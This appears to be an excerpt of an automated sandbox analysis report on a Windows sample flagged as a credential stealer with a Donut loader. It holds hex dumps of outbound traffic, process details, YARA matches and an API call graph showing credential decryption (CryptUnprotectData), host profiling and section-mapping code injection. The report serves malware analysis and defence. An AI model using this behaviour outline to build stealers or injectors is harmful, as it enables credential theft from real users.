                2024-07-24 19:02:16 UTC15331OUTData Raw: d1 c3 f0 43 bd d8 58 f1 07 45 dc 62 3c 18 47 b5 4f f1 7e 19 aa d2 0d 12 38 77 a4 88 57 21 22 2b 5e ff 86 09 a1 7f 7f 34 ec 27 31 2b 44 67 a0 da 27 d7 c5 fa 8a 86 23 19 22 44 35 dd 29 03 80 b1 3d 51 81 3b 4d a2 64 cc 1b 19 c6 44 d8 13 9e 27 5b ab d2 fb 96 cc e1 98 41 98 2d 24 b8 25 81 e9 43 c3 f1 dc 5b 91 1a 1f af 8f db c6 a9 8f 2b bd fc e2 c0 7c e6 60 cd b2 a7 4b c7 6d df f2 7b 3c 07 07 a5 9d b8 f1 a2 d6 0f 7c d7 2a 34 37 96 fe b8 cb ed 48 80 32 51 91 ac 30 12 2c 30 4d c9 d7 74 6d 20 75 60 2f 32 b2 fb fd 24 77 1a a5 cd 6f 58 70 0f 8d 45 6f d7 87 ed b3 34 c4 c2 b3 f8 12 4a f2 0a fb 4a 31 24 a9 f4 f5 55 cb 8b 66 6a 05 5f ac 7b fa 3d b9 3f 26 e7 eb 7e ad 3f 95 1e 8e 08 4d c4 ee 2a 2d 89 24 89 7e 45 68 82 01 f3 63 85 59 b4 da 3e 24 e9 1f c8 8e 56 55 39 c0 7e
                Data Ascii: CXEb<GO~8wW!"+^4'1+Dg'#"D5)=Q;MdD'[A-$%C[+|`Km{<|*47H2Q0,0Mtm u`/2$woXpEo4JJ1$Ufj_{=?&~?M*-$~EhcY>$VU9~
                2024-07-24 19:02:16 UTC15331OUTData Raw: 51 2f 4a 79 ef 7f 44 12 ba 3a d8 2f 1c 08 1e bd 9d 86 f3 07 32 d7 16 de 0c 57 f7 7e 50 25 35 1c d9 7d 87 dd 59 56 3b 9e 58 ed 55 54 35 bf 1e 32 ec 55 36 32 19 ce 5d c9 ac aa 5a d8 fc 10 e2 37 7b b4 8c fc e5 ef d7 10 e3 5d 00 f7 93 93 d6 4f b3 80 ff 7e 64 96 af 74 e8 ab c3 75 05 dc c5 f3 ac c1 cc c0 9d a1 2f 62 ce 1b 87 14 e4 a4 96 36 7f dc 5e a3 8f fe ab 26 6c e2 fc f5 f5 46 86 e8 d8 f2 7d 87 ea f9 6f e1 ac b1 a7 82 35 1d bf d7 4c fe a4 f0 ad 86 d3 51 c5 2c d2 9e 1b 49 7b e8 5d fe 2a b7 af 0f 0b 5b 19 73 4a 1c aa ee be 1b 2a b9 f9 cf 10 7b bd aa 9e 3f 87 a5 1c 36 1a f9 d5 c3 c0 a2 bc 23 f2 c1 7e ef a0 20 d8 af 71 f2 d9 0e 23 ef 4f fb 30 30 b7 6a 1f e3 4c 7e 9c c7 3e 06 f9 cc 71 10 ea f5 ab b0 be ee 9d e0 d4 07 0c 90 fc 2a 8c 15 8a a7 d1 69 b7 0a a1 71 12
                Data Ascii: Q/JyD:/2W~P%5}YV;XUT52U62]Z7{]O~dtu/b6^&lF}o5LQ,I{]*[sJ*{?6#~ q#O00jL~>q*iq
                2024-07-24 19:02:16 UTC15331OUTData Raw: aa d7 37 be e4 c6 31 05 ac 0b 91 ac 8a b9 57 8e c9 62 e2 7d 11 9b 24 dd b4 94 ea 4a 19 cf 86 de 80 a2 66 e8 5f e6 c4 9f 2d b0 d4 67 f9 14 46 9b f1 b3 09 87 01 66 dd 9f d1 74 cf ad d3 87 1b 79 e7 bf a2 22 ad 9f ef 90 7c 31 03 80 67 a7 e2 0c e6 2b 27 eb 9e ff e6 b2 fe 9b c8 e9 d3 be a5 94 ac 8d 6e da 65 bd f1 9e 96 d1 17 92 be e7 c2 e0 cf ab f1 6c 18 e2 96 8c e2 3c 56 dd 8e e9 c0 bb b8 e0 c9 57 17 cc 0c 56 64 6d 47 ed a8 0e 8e 96 38 1b 15 90 cc 5d f6 34 5d bb f7 85 fa 93 35 90 67 4a 9f 7b 54 bc 73 77 ff d7 21 fb ed 00 fd 9d c2 12 30 9c f8 19 49 a2 29 d0 8c f8 81 2e 3f 14 cd 0b 26 ca b3 35 d0 dd 3c cc 59 04 50 42 52 f0 d7 a4 8e 27 f3 57 65 4a 00 4d 38 02 02 3d 42 e7 8a 79 a0 1c fe 76 34 42 08 08 08 c3 fe b7 b3 b8 48 ad c0 0e 9d ed 61 a8 cb 5b 60 7f d4 54 0f
                Data Ascii: 71Wb}$Jf_-gFfty"|1g+'nel<VWVdmG8]4]5gJ{Tsw!0I).?&5<YPBR'WeJM8=Byv4BHa[`T
                2024-07-24 19:02:16 UTC15331OUTData Raw: 52 c7 f4 69 88 03 97 a7 52 a7 af 82 29 d6 0e 4f fd 03 6d dd c4 16 f3 2b 54 f5 0b 35 06 d5 46 ad 8c 95 88 d6 ff 6d 5d 47 70 dd b5 cc 38 15 1e a1 52 75 3a 13 03 b2 ca 11 6f fe 9f 50 fd 7f 72 b6 01 9c 66 66 4b 11 01 73 18 70 0d 3d 35 62 2f 09 35 bd dc ee fa c5 09 58 c0 01 39 86 84 ec 86 1d 4b 04 08 dd ce 57 85 82 94 e0 74 e1 15 03 40 46 84 89 82 03 5d 77 80 69 77 7d 30 86 ad 86 6a 39 e5 6f 54 38 d4 32 87 ff 67 12 d5 8b 3e 3a d4 2a 5e 80 8c 79 25 41 fe 60 06 e1 e4 33 ea 42 8c be cb 05 bd 9e cd 77 17 c5 11 65 c8 69 5a 6c 2b ae d7 51 38 79 d0 30 a5 3a 56 e9 86 e8 14 4a c0 82 48 45 6c 1e 5e 6a a7 23 88 ec 8b 3e d6 9b b3 1f 37 c3 75 b9 3b 6b 15 54 d8 14 10 2b 39 89 9b 7b fd 90 cd d6 88 a3 c3 b7 f8 8b 82 c6 d1 85 ef bc 12 0a 1d e2 56 66 f4 14 68 9d 87 5d 20 e2 3b
                Data Ascii: RiR)Om+T5Fm]Gp8Ru:oPrffKsp=5b/5X9KWt@F]wiw}0j9oT82g>:*^y%A`3BweiZl+Q8y0:VJHEl^j#>7u;kT+9{Vfh] ;
                2024-07-24 19:02:16 UTC15331OUTData Raw: d0 b2 84 34 2d 49 10 94 3f 97 fb df 3a bb 7e bb 66 5e e1 32 b8 e3 f7 8c cf 77 64 1c e6 8f f4 bf 33 13 05 00 e0 08 03 8d 44 28 14 30 d7 a7 a6 1e 8c a4 9d 87 f3 c3 eb b0 27 94 1b 9d b7 7b 20 ae 7a ff 61 03 b0 86 cd 53 e0 d5 1f 23 37 87 28 02 e0 d5 52 1b 92 ae c0 a2 a7 84 fe 2a 3d 60 80 9d 0a d0 40 42 bc 88 43 08 13 2a fd 1e 93 7b 9a 10 13 59 ed fb a5 55 e0 85 be b7 e4 cd 96 91 bf 6f d8 b1 aa 3a 0e 39 0a 0b d7 3f d7 bb 55 7a fd 0d 44 1e df b8 bc 47 06 68 df 1c 9a f8 07 b3 f1 15 62 94 55 1f c3 31 04 c7 74 30 42 d0 42 a3 50 af e4 4f 59 7a e3 9e 4b 67 72 b1 be 85 05 35 04 fe 39 38 3e b1 4c 47 34 bc be 0d b6 cb 46 e5 21 b2 fa e2 41 6c e7 5f c9 c9 5f 41 76 20 78 63 4a 2a 1a 78 c5 38 0b c8 79 f8 2b a9 02 f4 f6 d0 cf fa e0 5d a3 f1 8e 53 36 1f be bd f0 20 62 90 6f
                Data Ascii: 4-I?:~f^2wd3D(0'{ zaS#7(R*=`@BC*{YUo:9?UzDGhbU1t0BBPOYzKgr598>LG4F!Al__Av xcJ*x8y+]S6 bo
                2024-07-24 19:02:16 UTC15331OUTData Raw: 15 c9 4d 40 ad c8 7d 29 db cd 86 83 a0 4e 2d a6 54 bf 80 f7 24 d7 6f 4f 31 36 a4 75 fe 0b 5d 90 91 54 cc c5 a2 14 ed 78 10 07 25 eb 6b 1f 42 64 76 01 db 25 75 cb 03 62 18 18 7f 36 dc de 94 50 69 f5 5c 1c fe 2c 90 c6 fa ed ca fa fd 4f 5d cd b3 08 ee 66 ce f6 24 47 e9 8d 6b 8d 22 c7 2c 98 a5 b0 70 64 63 8f 35 db 3c 7e 31 9c d5 96 b8 a3 1e 43 51 1f 62 50 19 84 f1 c6 bf df be f8 f5 c2 86 6e f7 0a d6 7d e6 35 ee 32 b2 ff 94 ba d1 ea 0c 7d 99 f5 cf 6e a9 01 aa 2a 43 07 3b d5 c3 03 6a 96 bf ff f4 bc 79 29 c4 d2 8a 50 14 b7 59 81 89 9a 7f a3 7a fa fe 89 3b f3 4e 7d 9e 7e b9 3d 4f 5b 04 02 e8 be 37 95 02 f1 da e2 b2 6b 4a 7b 51 f8 e8 d5 c2 47 15 a8 ec 2b 41 8c d1 63 6a 61 bd df 05 bd d5 fe 98 e4 51 3b ed 5e 77 50 c4 4f 0b 79 8e f0 e1 88 aa e8 1f d7 b0 dd 37 13 47
                Data Ascii: M@})N-T$oO16u]Tx%kBdv%ub6Pi\,O]f$Gk",pdc5<~1CQbPn}52}n*C;jy)PYz;N}~=O[7kJ{QG+AcjaQ;^wPOy7G
                2024-07-24 19:02:16 UTC15331OUTData Raw: dc 3d fc 6d f5 28 3f 67 c8 64 e6 58 fd 4d 76 35 29 58 f0 dd 76 90 2e a1 0e 1d 6b 02 e0 a8 0e 98 ee dc 59 11 07 91 9c 63 5e 7b b0 7a de 4c 02 b4 8c a8 d0 6a ee df a7 3d 10 35 0d ff ce dd a7 92 5a 20 e1 ba f5 c5 23 d7 1a 64 bc 4c ef 6f 91 68 11 ab 6f 66 8a 8b 53 44 56 8e 67 17 f6 55 36 3c 2f 2c fe 69 8d 60 4a a3 32 3e 37 b0 fe 13 82 87 a3 e1 13 a2 c0 8e fd 01 12 3c a9 a8 d2 03 48 d0 29 05 9a 4d 7b ed 36 27 49 46 42 54 72 8b 05 60 be ba 3f 18 f4 b5 ae 12 a6 48 27 04 20 e0 44 ce 8b 27 35 3e dc ab 18 be 8f b4 d3 18 32 e8 f6 c6 59 90 ae 89 bb 8c 81 84 81 0c 4f 03 68 e9 af 3f c4 32 dc 1c 0f c0 c3 fa 43 4c 2f 89 c7 95 65 92 40 88 e9 28 4d 67 a2 9b f4 11 4c 06 6f 0d 73 f6 12 fb f2 5e c6 7e de 39 f2 e6 c9 f5 3c 70 ac 87 3e c1 f3 4e f8 91 a2 cd d4 42 7e 9b 22 48 99
                Data Ascii: =m(?gdXMv5)Xv.kYc^{zLj=5Z #dLohofSDVgU6</,i`J2>7<H)M{6'IFBTr`?H' D'5>2YOh?2CL/e@(MgLos^~9<p>NB~"H
                2024-07-24 19:02:16 UTC15331OUTData Raw: 9f 7b 19 64 b4 2b d5 06 1d f6 b2 49 77 8c 3b 98 91 6a 9f 19 b9 5f b6 d9 56 ef 49 f5 53 4c bf 92 0a 1c 00 1d fc eb 1f dd 28 62 b6 ea 30 f3 2c e2 ef 2b 98 e4 79 46 3a 3b 97 85 f7 f6 81 7e ad 16 26 21 eb d0 d8 ec 5c e0 e0 1c d5 85 68 7e 40 9f 14 aa 97 70 68 43 50 94 17 4c 73 88 29 89 0a af bf 10 e6 46 45 29 c6 7c e9 d5 b7 7f c9 5f a3 34 dc 86 b0 c2 42 31 27 1c 86 aa 5e 3e c1 b7 f0 ea 94 29 6e 45 46 f2 1d e7 c3 7a 65 a8 aa cc ac 83 61 46 fc d6 16 f0 8c b1 a3 e7 ed c4 f8 70 78 f5 c9 1f ba 51 a4 0e 16 2a 96 f1 62 89 8b 05 c5 32 a5 c2 eb 67 2d a8 aa e8 6b 08 4a f3 8a c0 33 49 ae 6a 90 50 dc ba b7 2b 13 f4 82 00 01 ee 3b 6d 41 b9 1f db ce 6a da 45 22 3d 82 f5 71 cd ab da 4c 55 35 95 9c ac ab 63 3f 65 dd 5b 96 d4 e5 db c3 82 fa b3 f6 03 ef 07 58 f3 8e c8 9b 57 85
                Data Ascii: {d+Iw;j_VISL(b0,+yF:;~&!\h~@phCPLs)FE)|_4B1'^>)nEFzeaFpxQ*b2g-kJ3IjP+;mAjE"=qLU5c?e[XW
                2024-07-24 19:02:16 UTC15331OUTData Raw: f5 a1 33 c3 d5 cd 10 15 87 48 c6 f0 5c df cd 4f b5 7c 5d 98 f7 1d e4 0f f5 2e 0e f8 79 86 cf f5 ae 56 ed 3d ad 15 34 fb 99 ec 37 8b a1 0f 99 73 62 b2 4e 35 d2 e9 7e af fc d9 dc bb fe 6c 9e c1 d8 ac 2e 85 a5 4e fc 4f 6d 60 2f f1 0b 7a 9c ed 03 f1 69 62 94 71 88 d5 6d 43 9e 32 9f ff 50 58 fa 3b d8 7d 5c fc e3 c4 fa 1b 14 70 1b 1e 1c 60 5f 07 f2 a4 ec ea c8 99 c6 d9 0d 47 fa 50 7f 38 ab 9d 85 40 81 70 ff e5 85 6b 1b 11 ee b7 81 5e 29 10 14 04 ee c3 9e 93 08 78 60 a7 0b 3c f0 07 cc 1f 16 b8 85 c7 55 57 6b 1d 0b e7 24 40 64 b9 0c 58 21 f0 fb 76 ce 0a 82 7e d4 6a cc 52 ca fc dc 03 cf c7 7e f6 66 cb f7 9c 2b 6f 14 97 37 59 31 23 9d 13 3f 5c 04 86 67 08 b4 27 80 75 3f 1a 76 de 05 32 f6 38 fc ef b8 58 e7 36 30 2d 8b 10 04 4e 4e 8f 25 4a 5f 9e 52 05 92 ab db 44 0e
                Data Ascii: 3H\O|].yV=47sbN5~l.NOm`/zibqmC2PX;}\p`_GP8@pk^)x`<UWk$@dX!v~jR~f+o7Y1#?\g'u?v28X60-NN%J_RD
                2024-07-24 19:02:18 UTC804INHTTP/1.1 200 OK
                Date: Wed, 24 Jul 2024 19:02:18 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=pq7hu4cvnrivc5ipmj8ghnqrsk; expires=Sun, 17-Nov-2024 12:48:57 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ViE8nhZR%2Bu5IvKW92kCgJiUiM1vpdXndpo4BFjTPLuw3LR06LHA29OTpyaPEDwUFnJm11VsG81ctNpwStmoy9A7e8Ix7ly3ZQ66tAp8nTUNfByCr8%2BrSsl%2FYfQYc6Ft1Mt2oeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a8629e1aef84387-EWR
                alt-svc: h3=":443"; ma=86400


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:15:01:49
                Start date:24/07/2024
                Path:C:\Users\user\Desktop\7Y18r(97).exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\7Y18r(97).exe"
                Imagebase:0x400000
                File size:10'906'544 bytes
                MD5 hash:CDC633170AD40F573D38AFEF8A18F53F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Borland Delphi
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1640181429.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                General

                Target ID:5
                Start time:15:02:18
                Start date:24/07/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 1680
                Imagebase:0x6d0000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:7.5%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:28.5%
                  Total number of Nodes:337
                  Total number of Limit Nodes:36
                  execution_graph 25135 2ac23ac 25136 2ac23b5 25135->25136 25139 2ac97b0 25136->25139 25138 2ac23e3 25140 2ac97e0 25139->25140 25143 2aec560 25140->25143 25142 2ac983b 25144 2aec580 25143->25144 25144->25144 25145 2aec6ee 25144->25145 25147 2ae9d10 LdrInitializeThunk 25144->25147 25145->25142 25147->25145 25148 2adfb2f 25149 2adfb34 25148->25149 25150 2adfbb9 KiUserCallbackDispatcher 25149->25150 25151 2adfbe1 DeleteObject 25150->25151 25153 2adfc5f SelectObject 25151->25153 25155 2adfd1b SelectObject 25153->25155 25156 2adfd47 DeleteObject 25155->25156 25158 2adfd96 25156->25158 25159 2ad7ea9 25161 2ad7ec4 25159->25161 25160 2ad7fcb FreeLibrary 25162 2ad7fda 25160->25162 25161->25160 25161->25161 25163 2ad7fea GetComputerNameExA 25162->25163 25164 2ad8059 GetComputerNameExA 25163->25164 25166 2ad817f 25164->25166 25167 2acbf25 25168 2acbf2a 25167->25168 25168->25168 25171 2acc1c0 25168->25171 25174 2aec380 25171->25174 25173 2acc219 25175 2aec3a0 25174->25175 25176 2aec50e 25175->25176 25178 2ae9d10 LdrInitializeThunk 25175->25178 25176->25173 25178->25176 25179 2ac71ba 25180 2ac71ca 25179->25180 25183 2aec850 25180->25183 25185 2aec880 25183->25185 25184 2ac71e4 25186 2aec8fe 25185->25186 25189 2ae9d10 LdrInitializeThunk 25185->25189 25186->25184 25190 2ae9d10 LdrInitializeThunk 25186->25190 25189->25186 25190->25184 25195 2ae97b2 25196 2ae9802 25195->25196 25197 2ae9850 LoadLibraryExW 25195->25197 25196->25197 25198 2ae985e 25197->25198 25199 2ad1c31 25200 2ad1c3a 25199->25200 25203 2aecd40 25200->25203 25202 2ad1c75 25204 2aecd70 25203->25204 25204->25204 25206 2aecdde 25204->25206 25211 2ae9d10 LdrInitializeThunk 25204->25211 25210 2aecece 25206->25210 25212 2ae7e80 25206->25212 25208 2aece21 25208->25210 25215 2ae9d10 LdrInitializeThunk 25208->25215 25210->25202 25211->25206 25213 2ae7ebc 25212->25213 25214 2ae7ef7 RtlAllocateHeap 25212->25214 25213->25214 25214->25208 25215->25210 25216 2ad2f8c 25217 2ad305f 25216->25217 25220 2aecc00 25217->25220 25221 2aecc20 25220->25221 25222 2ad30e2 25221->25222 25224 2ae9d10 LdrInitializeThunk 25221->25224 25224->25222 25225 2ab9980 25230 2ab998b 25225->25230 25226 2ab998f 25227 2ab9a6b ExitProcess 25226->25227 25229 2ab9a69 25229->25227 25230->25226 25231 2ab9a2b 25230->25231 25233 2ab999d 25230->25233 25237 2abab80 25230->25237 25231->25233 25242 2ae9c00 FreeLibrary 25233->25242 25234 2ab9a32 25234->25233 25235 2ab9a53 25234->25235 25241 2abc950 FreeLibrary 25235->25241 25238 2abab96 25237->25238 25239 2abace3 LoadLibraryExW 25238->25239 25240 2abad02 25239->25240 25240->25234 25241->25233 25242->25229 25243 2ab3480 25244 2ab36fa 25243->25244 25245 2ab3494 25243->25245 25245->25244 25250 2ae7e80 RtlAllocateHeap 25245->25250 25246 2ab36d5 25246->25244 25251 2ae7fdd RtlFreeHeap 25246->25251 25247 2ab34df 25247->25244 25247->25246 25249 2ae7e80 RtlAllocateHeap 25247->25249 25249->25246 25250->25247 25252 2ae9985 GetLogicalDrives GetLogicalDrives 25253 2ad1180 25254 2ad118d 25253->25254 25255 2aecd40 2 API calls 25254->25255 25256 2ad11b4 25255->25256 25269 2ac7a10 25271 2ac7a20 25269->25271 25270 2ac7bb6 CryptUnprotectData 25271->25270 25275 2ac0393 25276 2ac03d7 25275->25276 25289 2ab2f30 25276->25289 25278 2ac050d 25279 2acec40 LdrInitializeThunk 25278->25279 25280 2ac0526 25279->25280 25281 2acf6f0 LdrInitializeThunk 25280->25281 25282 2ac0566 25281->25282 25283 2ad2290 RtlAllocateHeap LdrInitializeThunk 25282->25283 25284 2ac058f 25283->25284 25285 2ad2740 RtlAllocateHeap LdrInitializeThunk 25284->25285 25286 2ac0598 25285->25286 25287 2aded00 6 API calls 25286->25287 25288 2ac05e1 25287->25288 25290 2ab3047 25289->25290 25291 2ab2f3e 25289->25291 25292 2ab300e 25291->25292 25295 2ab2f53 25291->25295 25298 2ab2fd5 25291->25298 25294 2ab2f30 RtlFreeHeap 25292->25294 25292->25298 25293 2ab2f93 25302 2ae7fdd RtlFreeHeap 25293->25302 25294->25292 25295->25290 25295->25293 25297 2ab2f30 RtlFreeHeap 25295->25297 25296 2ab2fb1 25299 2ae7fdd RtlFreeHeap 25296->25299 25297->25295 25303 2ae7fdd RtlFreeHeap 25298->25303 25299->25298 25304 2ac7deb 25305 2ac7e2c 25304->25305 25316 2ac6840 25305->25316 25307 2ac7e86 25308 2ac6840 LdrInitializeThunk 25307->25308 25309 2ac7f43 25308->25309 25310 2ac6840 LdrInitializeThunk 25309->25310 25311 2ac802d 25310->25311 25312 2ac6840 LdrInitializeThunk 25311->25312 25313 2ac80ec 25312->25313 25313->25313 25314 2ac6840 LdrInitializeThunk 25313->25314 25315 2ac8b80 25314->25315 25317 2ac6890 25316->25317 25318 2aec380 LdrInitializeThunk 25317->25318 25319 2ac699c 25318->25319 25320 2ac2665 25321 2ac2676 25320->25321 25324 2ac6cb0 25321->25324 25323 2ac2686 25325 2ac6cd0 25324->25325 25326 2aec380 LdrInitializeThunk 25325->25326 25327 2ac6e98 25326->25327 25328 25bdc97 25329 25bdcbc 25328->25329 25330 25bdda6 25328->25330 25361 25c0519 25329->25361 25340 25bef72 25330->25340 25333 25bdcd4 25334 25c0519 LoadLibraryA 25333->25334 25339 25bdd4c 25333->25339 25335 25bdd16 25334->25335 25336 25c0519 LoadLibraryA 25335->25336 25337 25bdd32 25336->25337 25338 25c0519 LoadLibraryA 25337->25338 25338->25339 25341 25c0519 LoadLibraryA 25340->25341 25342 25bef95 25341->25342 25343 25c0519 LoadLibraryA 25342->25343 25344 25befad 25343->25344 25345 25c0519 LoadLibraryA 25344->25345 25346 25befcb 25345->25346 25347 25befe0 VirtualAlloc 25346->25347 25359 25beff4 25346->25359 25349 25bf00e 25347->25349 25347->25359 25348 25c0519 LoadLibraryA 25351 25bf08c 25348->25351 25349->25348 25349->25359 25350 25c0519 LoadLibraryA 25353 25bf0e2 25350->25353 25351->25353 25351->25359 25365 25c0320 25351->25365 25352 25bf144 25352->25359 25360 25bf1a6 25352->25360 25391 25be102 LoadLibraryA 25352->25391 25353->25350 25353->25352 25353->25359 25356 25bf18f 25356->25359 25392 25be1fd LoadLibraryA 25356->25392 25359->25339 25360->25359 25369 25bf6a2 25360->25369 25364 25c0530 25361->25364 25362 25c0557 25362->25333 25364->25362 25395 25be61e LoadLibraryA 25364->25395 25366 25c0335 25365->25366 25367 25c03ab LoadLibraryA 25366->25367 25368 25c03b5 25366->25368 25367->25368 25368->25351 25370 25bf6dd 25369->25370 25371 25bf724 NtCreateSection 25370->25371 25373 25bf749 25370->25373 25390 25bfd51 25370->25390 25371->25373 25371->25390 25372 25bf7de NtMapViewOfSection 25383 25bf7fe 25372->25383 25373->25372 25373->25390 25374 25bfb27 VirtualAlloc 25379 25bfb69 25374->25379 25375 25c0320 LoadLibraryA 25375->25383 25376 25c0320 LoadLibraryA 25382 25bfa85 25376->25382 25377 25bfc1a VirtualProtect 25380 25bfce5 VirtualProtect 25377->25380 25385 25bfc3a 25377->25385 25378 25bfb23 25378->25374 25379->25377 25388 25bfc07 NtMapViewOfSection 25379->25388 25379->25390 25386 25bfd14 25380->25386 25381 25c03be LoadLibraryA 25381->25383 25382->25374 25382->25376 25382->25378 25393 25c03be LoadLibraryA 25382->25393 25383->25375 25383->25381 25383->25382 25383->25390 25385->25380 25389 25bfcbf VirtualProtect 25385->25389 25386->25390 25394 25c00d3 LoadLibraryA 25386->25394 25388->25377 25388->25390 25389->25385 25390->25359 25391->25356 25392->25360 25393->25382 25394->25390 25395->25364 25403 2ad477d 25404 2ad4790 25403->25404 25405 2aec380 LdrInitializeThunk 25404->25405 25406 2ad493c 25405->25406 25407 2aec380 LdrInitializeThunk 25406->25407 25407->25406 25408 2ad88ff 25409 2ad8906 25408->25409 25409->25409 25410 2ad8a45 GetPhysicallyInstalledSystemMemory 25409->25410 25411 2ad8a6a 25410->25411 25412 2ac6ef8 25413 2ac6efd 25412->25413 25413->25413 25416 2ae9d10 LdrInitializeThunk 25413->25416 25415 2ac7979 25416->25415 25417 2ada3f6 25418 2ada51f SysAllocString 25417->25418 25419 2ada4d7 25417->25419 25420 2ada591 25418->25420 25419->25418 25419->25419 25425 2ae98cf 25426 2ae98da 25425->25426 25433 2aea06f 25426->25433 25436 2aea1b3 25426->25436 25440 2ae9de5 25426->25440 25446 2aea536 25426->25446 25449 2aea28f 25426->25449 25455 2aea60f 25426->25455 25435 2aea075 25433->25435 25434 2ae9d10 LdrInitializeThunk 25434->25435 25435->25434 25438 2aea1d8 25436->25438 25437 2aea23e 25438->25437 25459 2ae9d10 LdrInitializeThunk 25438->25459 25441 2ae9de0 25440->25441 25441->25440 25443 2ae9dee 25441->25443 25461 2ae9d10 LdrInitializeThunk 25441->25461 25443->25443 25444 2ae9eae 25443->25444 25460 2ae9d10 LdrInitializeThunk 25443->25460 25444->25444 25447 2aea075 25446->25447 25448 2ae9d10 LdrInitializeThunk 25447->25448 25448->25447 25451 2aea2c8 25449->25451 25450 2aea32e 25462 2ae9d10 LdrInitializeThunk 25450->25462 25451->25450 25463 2ae9d10 LdrInitializeThunk 25451->25463 25454 2aea463 25456 2aea615 25455->25456 25457 2aea075 25455->25457 25457->25456 25458 2ae9d10 LdrInitializeThunk 25457->25458 25458->25457 25459->25437 25460->25444 25461->25443 25462->25454 25463->25450 25471 2aca4c5 25473 2aca5d3 25471->25473 25472 2ac6840 LdrInitializeThunk 25474 2aca653 25472->25474 25473->25472 25475 2ac6840 LdrInitializeThunk 25474->25475 25476 2aca79b 25475->25476 25477 2acca45 25478 2ae7e80 RtlAllocateHeap 25477->25478 25479 2acca51 25478->25479 25480 2ac6ec6 25481 2ac6ed0 25480->25481 25482 2aec850 LdrInitializeThunk 25481->25482 25483 2ac6ee2 25482->25483 25484 2ae3fc4 25485 2aec380 LdrInitializeThunk 25484->25485 25486 2ae3fd9 25485->25486 25487 2aec380 LdrInitializeThunk 25486->25487 25488 2ae4024 25487->25488 25492 2acb640 25493 2acb64e 25492->25493 25497 2acb690 25492->25497 25498 2acb750 25493->25498 25495 2acb70c 25496 2ac9950 LdrInitializeThunk 25495->25496 25495->25497 25496->25497 25499 2acb7ad 25498->25499 25499->25499 25500 2aec560 LdrInitializeThunk 25499->25500 25501 2acb8ad 25500->25501 25502 2ad1cc0 25503 2ad1d15 25502->25503 25506 2aed680 25503->25506 25505 2ad1d82 25508 2aed6a0 25506->25508 25507 2aed75e 25509 2ae7e80 RtlAllocateHeap 25507->25509 25513 2aed852 25507->25513 25508->25507 25514 2ae9d10 LdrInitializeThunk 25508->25514 25511 2aed7a3 25509->25511 25511->25513 25515 2ae9d10 LdrInitializeThunk 25511->25515 25513->25505 25514->25507 25515->25513 25516 2ac6bc2 25517 2ac6be8 25516->25517 25519 2ac6c4e 25517->25519 25520 2ae9d10 LdrInitializeThunk 25517->25520 25520->25519 25524 2ab36c4 25528 2ae7e80 RtlAllocateHeap 25524->25528 25525 2ab36d5 25526 2ab36fa 25525->25526 25529 2ae7fdd RtlFreeHeap 25525->25529 25528->25525 25538 2ac72dd 25539 2ac72e2 25538->25539 25539->25539 25540 2ac737e 25539->25540 25542 2ae9d10 LdrInitializeThunk 25539->25542 25542->25540 25543 2ac69df 25544 2aec850 LdrInitializeThunk 25543->25544 25545 2ac69f4 25544->25545 25555 2ae3dd6 25558 2aeb840 25555->25558 25557 2ae3dfc GetVolumeInformationW 25559 2aeb881 25558->25559 25560 25706ad 25561 25706bb 25560->25561 25574 2570ffd 25561->25574 25563 2570853 GetPEB 25565 25708d0 25563->25565 25564 257080e 25564->25563 25573 2570b41 25564->25573 25577 2570dbd 25565->25577 25568 2570931 CreateThread 25569 2570909 25568->25569 25589 2570c6d GetPEB 25568->25589 25569->25573 25586 25712bd GetPEB 25569->25586 25571 257098b 25572 2570dbd 5 API calls 25571->25572 25571->25573 25572->25573 25587 257101d GetPEB 25574->25587 25576 257100a 25576->25564 25578 2570dd3 CreateToolhelp32Snapshot 25577->25578 25580 2570903 25578->25580 25581 2570e0a Thread32First 25578->25581 25580->25568 25580->25569 25582 2570ec6 FindCloseChangeNotification 25581->25582 25583 2570e31 25581->25583 25582->25580 25583->25582 25584 2570e68 Wow64SuspendThread 25583->25584 25585 2570e92 FindCloseChangeNotification 25583->25585 25584->25585 25585->25583 25586->25571 25588 2571038 25587->25588 25588->25576 25592 2570cc6 25589->25592 25590 2570d26 CreateThread 25590->25592 25593 257149d 25590->25593 25591 2570d73 25592->25590 25592->25591 25594 25714a4 25593->25594 25596 25714aa 9 API calls 25594->25596 25602 2ae9cd2 RtlReAllocateHeap 25603 2ae9cf7 25602->25603

                  Executed Functions

                  Function 025BF6A2 Relevance: 11.2, APIs: 7, Instructions: 730memorynativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 025BF73B
                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 025BF7E3
